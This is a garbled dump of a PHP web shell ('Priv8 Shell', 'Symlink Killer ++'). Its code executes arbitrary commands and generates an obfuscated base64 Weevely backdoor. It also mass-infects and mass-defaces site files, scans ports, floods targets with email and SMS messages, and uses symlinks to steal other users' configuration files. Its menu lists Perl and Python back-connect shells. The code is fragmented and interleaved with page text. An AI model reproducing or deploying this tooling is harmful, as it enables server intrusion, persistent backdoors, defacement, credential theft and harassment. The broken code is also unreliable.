Symlink Killer ++

advertisement
array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { $res.=
htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $res.=
htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]);
proc_close($execute); return $res; } elseif (function_exists("proc_open")) { $execute =
proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1]))
{ $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) {
$res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]);
proc_close($execute); return $res; } elseif (function_exists("exec")) { $res = exec($cmd); return
$res; } elseif (function_exists("system")) { $res = system($cmd); return $res; } elseif
(function_exists("shell_exec")) { $res = shell_exec($cmd); return $res; } elseif
(function_exists("passthru")) { $res = passthru($cmd); return $res; } else { error("The necessary
functions to execute commands are disabled!"); } } //Unzip function function unzip($filename,
$directory) { $zip = new ZipArchive; $res = $zip->open($filename); if ($res === TRUE) { $zip>extractTo($directory); $zip->close(); success("unzip", $directory); } else { cmd2("unzip
$filename", $directory); } } //Get files and directories and throw them into an array. $open =
opendir($dir); $files = array(); $direcs = array(); while ($file = readdir($open)) { if ($file != "."
&& $file != "..") { if (is_dir("$dir/$file")) { array_push($direcs, $file); } else {
array_push($files, $file); } } } asort($direcs); asort($files); ?>
Priv8 Shell By Secret HaCk ::SDN::
uname
server_ip
your_ip
server_software
disabled_functions
[Home] [Perl Back Connect] [Python Back connect] [Encrypt] [Mass Deface]
[Mass File Infect] [Install MSD]
[ Sender] [Reverse IP] [Weevely Backdoor] [Port Scan]
[ about ]
<= $endport) { if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) { echo " Port
$startport is open on $scanhost
"; } else { echo "Port $startport is not open on $scanhost
"; } $startport++; } } ?> < 3) { error("Password must be longer than 3 characters!"); } else {
$first2 = $weevpassword[0] . $weevpassword[1]; $rest = substr($weevpassword, 2); $money
= "$"; $weevelybd1 =
base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=
'); $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" .
"a)>3) {"; $weevelybd3 = "$money" . "k='$rest';"; $weevelybd4 =
base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbG
FjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zb
GljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs
='); $all = " < $count) { $name_servers = $dns_record[$num]; $name_servers2 =
$name_servers['type']; $name_servers3 = @$name_servers['target']; $num++; if
($name_servers2 == "NS") { echo "$name_servers3
"; $nshost = @$name_servers['host']; } if ($name_servers2 == "SOA") { $nsemail =
$name_servers['rname']; } if ($name_servers2 == "A") { $nsip = $name_servers['ip']; } }
$num = 0; echo "
"; $domains_on_server =
json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-webserver/php/testing.php?remoteAddress=$domain")); $status = $domains_on_server->status;
$message = $domains_on_server->message; $domainAr = $domains_on_server->domainArray;
$num_of_site = $domains_on_server->domainCount; $count = sizeof($domainAr); if ($status
== "Success") { echo "Found $num_of_site sites hosted on the same server as $nshost($nsip)
via www.yougetsignal.com:
"; while ($num < $count) { $hossites = $domainAr[$num]; $num++;
$hossites3
$hossites3 = $domainAr[$num]; $hossites3 = $hossites3[0]; $hossites =
$hossites[0]; $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) $site_ips2
. ")"; $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . "; $num++;
} echo "
")"; echo "
$hossites $site_ips
"; $num = 0; } else { error("Iam not Happy because i Failed to find or get sites hosted on
same server from: www.yougetsignal.com!
Additional Message:
$message"); } echo "
"; } ?> < $amount) { if (!@mail($to, $subject, $msgcontent, $headers)) {
$numsent++; $sent_fail++; } else { $numsent++; $sent_success++; } } echo
"Successfully sent $sent_success messages.
Failed to send $sent_fail messages.
"; } } if (isset($_GET['sms'])) { echo "
Phone Number With
Area Code
Carrier:
Amount Of Messages To
Send:
From:
Subject:
Message Content:
Bomb
"; } ?> $file) { $file2 = trim($file, "."); $getinf_file = file_get_contents($file2); if
("$file2" == "$dir/$script2") { echo ""; } else { if (file_put_contents("$file2",
$masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) { echo
"Successfully infected file: $file2
"; $success++; } else { echo "Failed to infect file : $file2
"; $failed++; } } } echo "$success files successfully infected! ^_^
Failed to infect $failed files! :(
"; } } if (isset($_GET['massinfect'])) { $example = ""; $example =
htmlspecialchars($example); $example2 = ""; $example2 =
htmlspecialchars($example2); echo "
Directory to start infect from:
Custom Directory:
This is great for infecting mass files with javascript scripts or php scripts
It will append the code to the top of each file.
Example:
$example
$example2
Infect code:
This will not infect this shell.
Infect
"; } ?> $file) { $file2 = trim($file, "."); if ("$file2" == "$dir/$script2") { echo "";
} else { if (file_put_contents("$file2", $mass_source)) { echo "Successfully
defaced file: $file2
"; $success++; } else { echo "Failed to deface file: $file2
"; $failed++; } } } echo "$success files successfully defaced!
Failed to deface $failed files!
"; } } if (isset($_GET['massdeface'])) { echo "
Directory to start deface from:
Custom Directory:
Source of deface:
This will not deface this shell.
Deface
"; } ?> < count($ex);$p++) { @$linkpath.= $ex[$p] . '/'; $linkpath2 =
rtrim($linkpath, "/"); echo "$ex[$p]/"; } echo "
/File
Owner/Group
e
$downer/$dgroup
Permissions
$dperms
Mass
"; foreach ($direcs as $d) { $downer =
function_exists("posix_getpwuid") ?
posix_getpwuid(fileowner("$dir/$d"))
fileowner("$dir/$d"); $dgroup =
function_exists("posix_getgrgid") ?
posix_getgrgid(filegroup("$dir/$d")) :
filegroup("$dir/$d"); if
(is_array($downer)) { $downer =
Last
Writeable Size
Delete Rename
$downer['name']; } if
Modified
(is_array($dgroup)) { $dgroup =
$dgroup['name']; } $dperms =
substr(base_convert(fileperms("$dir/$
, 10, 8), 2); $dwrite =
is_writeable("$dir/$d") ? "Writeable"
"Non Writeable"; $dsize = "Directory
$dtime = date("F d Y g:i:s",
filemtime("$dir/$d")); echo "
$dwrite
$dsize
$dtime Delete Rename "; } foreach ($files as $f) { $fowner =
function_exists("posix_getpwuid") ?
posix_getpwuid(fileowner("$dir/$f"))
e2
{
fileowner("$dir/$f"); $fgroup =
function_exists("posix_getgrgid") ?
posix_getgrgid(filegroup("$dir/$f")) :
filegroup("$dir/$f"); if
(is_array($fowner)) { $fowner =
$fowner['name']; } if (is_array($fgrou
{ $fgroup = $fgroup['name']; } $fperm
substr(base_convert(fileperms("$dir/$
10, 8), 2); $fwrite =
is_writeable("$dir/$f") ? "Writeable
^_^" : "Not Writeable"; $fsize =
ByteConversion(filesize("$dir/$f"));
$ftime = date("F d Y g:i:s",
filemtime("$dir/$f")); $zip_file =
explode(".", $f); $zip_file2 =
end($zip_file); echo "
"; } else { echo " "; } echo "
$fperms $fwrite
$f
$fowner/$fgroup
$fsize
$ftime Delete
Rename
"; echo "
With all selected:
permission Submit
"; echo "
"; closedir(); ?> < $length) { $arrand = array_rand($characters, 1); $salt.=
$characters[$arrand]; $i++; } return $salt; } ?>
Symlink Killer ++
Click this button to Create PHP.ini
Generate PHP.ini
Click this button to find usernames to steal configurations
Find usernames
Start Extract
Click this button to open manual symlink form
Open Manual symlink form
file link that you want symlink:-
/home/user
file name with which you want
represent symlink :- ow ned.txt
use .txt(owned.txt) or no extension(owned) for file which will represent symlink
Lets do it
Click this button To Get Configs
Secret Hack
Configuration File Killer
Symlink bypasser ( Use this tools if Cant read /etc/named )
Let's Do it
Start the game
_< if (isset($_GET['kill'])) { if (unlink("$dir/$script2")) { success("shell_killed");
} else { error("Failed to kill shell!"); } } //Delete Directory if
(isset($_GET['deldir'])) { $deldir = $_GET['deldir']; $redir = dirname($deldir);
if (rmdir($deldir)) { success("dir_del", rtrim($redir, '/')); } else { error("Failed
to delete directory!"); } } //Rename Directory if (isset($_GET['rendir'])) {
$rendir = $_GET['rendir']; $dend = $_GET['old']; echo "
$dend
Rename
"; } if (isset($_POST['do_rename_dir'])) { $newdir = $_POST['new_dir_name'];
$rendir = $_GET['rendir']; $dend = $_GET['old']; if (rename("$rendir/$dend",
"$rendir/$newdir")) { success("dir_renamed", $rendir); } else {
error("Directory was not renamed!"); } } //Delete file if (isset($_GET['delfile'])) {
$delfile = $_GET['delfile']; $redir = dirname($delfile); if (unlink($delfile)) {
success("filedelete", rtrim($redir, '/')); } else { error("Failed to delete file!"); } }
//Rename File if (isset($_GET['renfile'])) { $renfile = $_GET['renfile']; $fend =
$_GET['old']; echo "
$fend
Rename
"; } if (isset($_POST['do_rename_file'])) { $newfile = $_POST['new_file_name'];
$renfile = $_GET['renfile']; $fend = $_GET['old']; if (rename("$renfile/$fend",
"$renfile/$newfile")) { success("file_renamed", $renfile); } else { error("File was
not renamed!"); } } //Mass Files Stuff if (isset($_POST['mass_files'])) { $action =
$_POST['mass_action']; $chmodvalue = $_POST['chmod_value']; $box =
$_POST['delbox']; if ($action == "Delete") { foreach ($box as $b) { if (is_dir($b))
{ if (rmdir($b)) { echo "Deleted Directory: $b
"; } else { echo "Failed To Delete Directory: $b
"; } } else { if (unlink($b)) { echo "Deleted File: $b
"; } else { echo "Failed To Delete file: $b
"; } } } } if ($action == "chmod") { foreach ($box as $b) { if (is_dir($b)) { if
(chmod($b, $chmodvalue)) { echo "Changed Permissions Of Directory: $b
"; } else { echo "Failed To Change Permissions Of Directory: $b
"; } } else { if (chmod($b, $chmodvalue)) { echo "Changed Persmissions Of File:
$b
"; } else { echo " >_< Failed To Change Permissions Of File: $b
"; } } } } } ?>
Copyright 2014 by: ‫ ك ري زي م س تر‬, ‫وال جوام عه مجاهد‬
Download